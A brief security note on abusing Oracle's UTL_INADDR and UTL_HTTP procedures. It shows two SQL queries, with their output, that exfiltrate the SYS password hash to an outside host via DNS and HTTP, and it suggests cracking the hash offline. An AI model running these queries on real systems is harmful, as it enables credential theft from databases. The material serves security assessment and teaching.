默认ORACLE密码
Default Oracle Passwords
http://www.vulnerabilityassessment.co.uk/default_oracle_passwords.htm
Oracle has a couple of stored procedures that can be manipulated to enumerate sensitive application system information. You are basically using Oracles in-built web services against itself. This was demonstrated at the Blackhat Breaking into Oracle Server class given by David Litchfield of NGS Software. The procedures in question are:
-
UTL_HTTP.REQUEST
-
UTL_INADDR.GET_HOST_ADDRESS
Abusing normal DNS and HTTP requests from a normal SQL prompt it may be possible to gain passwords hashes etc:
SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US
ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM
E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
*
ERROR at line 1:
ORA-29257: host D3AAEDA7EDA1B4AA.vulnerabilityassessment.co.uk unknown
ORA-06512: at "SYS.UTL_INADDR", line 19
ORA-06512: at "SYS.UTL_INADDR", line 40
ORA-06512: at line 1
and
SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_U
SERS WHERE USERNAME='SYS')) from dual;
UTL_HTTP.REQUEST('HTTP://GLADIUS:5500/'||(SELECTPASSWORDFROMDBA_USERSWHEREUSERNA
--------------------------------------------------------------------------------
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>Resou
rce /D3AAEDA7EDA1B4AA not found on this server</BODY></HTML>
In both examples above the SYS password is very nicely provided to us which can then be cracked offline with tools such as Cain etc.
